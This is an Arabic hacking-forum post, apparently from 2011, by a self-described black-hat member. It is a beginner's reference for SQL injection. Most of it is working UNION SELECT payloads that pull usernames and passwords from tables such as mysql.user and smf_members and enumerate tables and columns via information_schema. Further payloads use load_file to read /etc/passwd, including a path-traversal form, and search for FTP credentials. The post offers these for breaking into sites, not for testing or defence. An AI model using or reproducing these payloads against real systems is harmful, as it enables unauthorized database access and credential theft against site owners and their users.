| المعلومات |
| الكاتب: |
|
| اللقب: |
[{ عضو مميز }] |
| الصورة الرمزية |
|
|
| البيانات |
| التسجيل : |
Jul 2011 |
| العضوية : |
2184 |
| الاهتمامات : |
PeneteratioN Testing |
| الإقامة : |
coMputer any one |
| المواضيع : |
181 |
| الردود : |
419 |
| المجموع : |
600 |
| بمعدل : |
0.11 يوميا |
| الاختراقات : |
[] |
| مجتمعنا : |
[/] |
| الصنف : |
Black Hat Hacker |
| آخر تواجد : |
27/10/2017/19:45 |
| سبب الغياب : |
حاضر |
| معدل التقييم: |
15 |
| نقاط التقييم: |
21 |
شكراً: 128
تم شكره 120 مرة في 72 مشاركة
| الإتصالات |
| الحالة: |
|
| وسائل الإتصال: |
|
|
حقن قواعد البيانات بثغرت SQL injection
بسـم اللــه الرحمــن الرحيــم
السلام عليكم اخواني الغاليين
مجموعه الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL jnjection
وان شاء الله تفيدكم في الحقن وتكون مرجع للمبتدئين حتى يحفظون الاستغلال نبدأ على بركة الله
اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن
الرمز:
user & users & username & admin & adminlogim & login & member & membername
user_name
الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن
الرمز:password & pass & passwd & pwd
اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس
الرمز:
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن
الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل
الرمز:union+select+1,2,user,4,5+from+mysql.user
ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل
الرمز:union+select+1,2,password,4,5+from+mysql.user
مثال اخر على الكلمات السابقه للتوضيع
الرمز:union+select+1,2,membername,4,5+from+smf_members
لاستخراج الجداول في قواعد البيانات وقت الحقن
الرمز:union+select+1,2,table_name,4,5+from+information_s chema.tables
لاستخراج الاعمده في قواحد البيانات وقت الحقن
الرمز:union+select+1,2,column_name,4,5+from+information_ schema.columns
الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل
طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً
الرمز:union+select+1,2,username,4,5+from+users+where+use rid=1/*
الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه
الرمز:load_file("/هنا الاوامر")
مثال على هذا
الرمز:union+select+1,load_file("/"),3,4+from+mysql.user
وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر
الرمز:union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user
او نجرب هذا نفس الامر بس نتراجع للخلف
الرمز:union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user
الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن
هذا الامر خاص بالبحث في الجداول
الرمز:union+select+1,2,table_name,4,5+from+information_s chema.tables+where+table_name+like+'%25ftp%25'/*
هذا الامر خاص بالبحث في الاعمده
الرمز:union+select+1,2,column_name,4,5+from+information_ schema.columns+where+column_name+like+'%25ftp%25'/*
FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ
الرمز:'%25ftp%25' <<< في هذا الامر
تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة
الرمز: '%25user%25' & '%25logim%25'
يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني
ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي
التعديل الأخير تم بواسطة S4wDz ; 25/07/2011 الساعة 02:40
|